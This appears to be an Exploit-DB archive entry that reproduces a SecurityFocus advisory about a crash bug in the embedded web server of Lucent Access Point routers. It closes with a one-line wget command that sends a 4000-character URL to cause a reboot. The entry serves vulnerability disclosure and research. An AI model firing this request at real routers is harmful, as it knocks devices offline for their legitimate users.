exploit-db-mirror/exploits/hardware/dos/21656.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

7 lines
No EOL
484 B
Text

source: https://www.securityfocus.com/bid/5333/info
The Lucent Access Point series of routers support a web based administrative interface. An error has been reported in the embedded HTTP server.
It has been reported that sending a HTTP request consisting of approximately 4000 characters of data will cause the device to reboot. This may result in an interruption of service for legitimate users of the device.
wget `perl -e 'print "http://router_ip/"; print "A"x4000; print "/";`